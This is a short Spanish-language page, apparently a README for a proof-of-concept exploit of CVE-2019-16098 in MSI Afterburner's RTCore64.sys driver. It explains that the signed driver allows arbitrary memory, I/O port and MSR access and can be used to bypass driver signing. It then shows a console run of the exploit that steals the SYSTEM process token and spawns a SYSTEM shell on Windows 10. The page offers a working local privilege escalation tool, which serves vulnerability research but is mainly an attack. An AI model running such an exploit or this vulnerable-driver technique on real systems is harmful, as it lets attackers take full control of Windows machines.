CVE 2019 16098
1.0.0
El controlador en Micro-Star MSI Afterburner 4.6.2.15658 (también conocido como RTCore64.Sys y RTCore32.sys) permite a cualquier usuario autenticado leer y escribir en memoria arbitraria, puertos de E/S y MSRS. Esto puede explotarse para la escalada de privilegios, la ejecución del código bajo altos privilegios y la divulgación de información. Estos controladores firmados también se pueden usar para evitar la política de firma de controladores de Microsoft para implementar el código malicioso.
Para obtener más actualizaciones, visite CVE-2019-16098
ADVERTENCIA : Windows 10 X64 Versión 1903 Hardado Windows 1903!
Microsoft Windows [Version 10.0.18362.295]
(c) 2019 Microsoft Corporation. All rights reserved.
C:UsersBarakatsourcereposCVE-2019-16098>whoami
Barakat
C:UsersBarakatsourcereposCVE-2019-16098>outbuildx64-DebugCVE-2019-16098.exe
[*] Device object handle has been obtained
[*] Ntoskrnl base address: FFFFF80734200000
[*] PsInitialSystemProcess address: FFFFC288A607F300
[*] System process token: FFFF9703A9E061B0
[*] Current process address: FFFFC288B7959400
[*] Current process token: FFFF9703B9D785F0
[*] Stealing System process token ...
[*] Spawning new shell ...
Microsoft Windows [Version 10.0.18362.295]
(c) 2019 Microsoft Corporation. All rights reserved.
C:UsersBarakatsourcereposCVE-2019-16098>whoami
SYSTEM
C:UsersBarakatsourcereposCVE-2019-16098>
